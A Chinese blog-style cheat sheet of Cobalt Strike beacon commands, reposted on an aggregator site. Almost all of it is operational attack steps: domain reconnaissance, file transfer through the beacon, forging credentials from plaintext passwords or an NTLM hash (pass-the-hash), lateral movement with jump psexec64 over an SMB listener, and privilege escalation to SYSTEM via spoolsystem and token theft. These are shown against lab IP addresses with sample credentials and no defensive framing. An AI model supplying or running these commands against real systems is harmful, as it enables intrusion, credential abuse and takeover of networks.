信息收集

#列出正在登陸的用戶 net logons #列出域控(組) net domain_controllers #列出域控列表 net dclist #顯示當前域 net domain #列出當前session net sessions #列出盤符 drives

文件上傳

上傳

cd C:\Windows\apppatch upload 1.txt

下載

download xxx.txt

列出當前執行時間很久的任務并刪除

jobs jobkill

取消正在下載的文件

cancel 1.txt

創建憑據并執行命令（無回顯）

工作組中如果兩個機器密碼或者說登陸憑據是相同的，那么可以直接dir \ip\c$ 成功。

#在有憑據的情況下可以執行命令 remote-exec psexec \\192.168.171.142 whoami

憑據錯誤時的報錯：

#創建憑據，只能用明文密碼 make_token workgroup\administrator 123123 #使用hash創建 pth administrator 579110c49145015c47ecd267657d3174

此時發現命令執行成功

利用smb beacon上線爆出密碼的機器

創建smb監聽并命名為q

#如果得到明文 make_token workgroup\administrator 123123 #如果得到hash pth administrator 579110c49145015c47ecd267657d3174 #上線 jump psexec64 192.168.171.142 q

如果機器出網，可以選擇上線之后再spawn得到一個直連的session。

connect命令

可創建一個tcp的listener，然后使用connect命令連接：

更改當前beacon的父進程

返回system權限的shell

得到system權限后，需要重新執行木馬文件才能獲得sys權限的shell

execute C:\Users\Administrator\Desktop\beacon.exe

上線ssh機器

ssh 192.168.171.139 root 1

使用spoolsystem獲得system權限

需要有SeImpersonatePrivilege權限

spoolsystem spawn spoolsystem selfinject steal_token 一個system權限程序的pid shell whoami spoolsystem spawn spoolsystem selfinject getsystem shell whoami

總結

以上是生活随笔為你收集整理的cs的常用命令操作的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。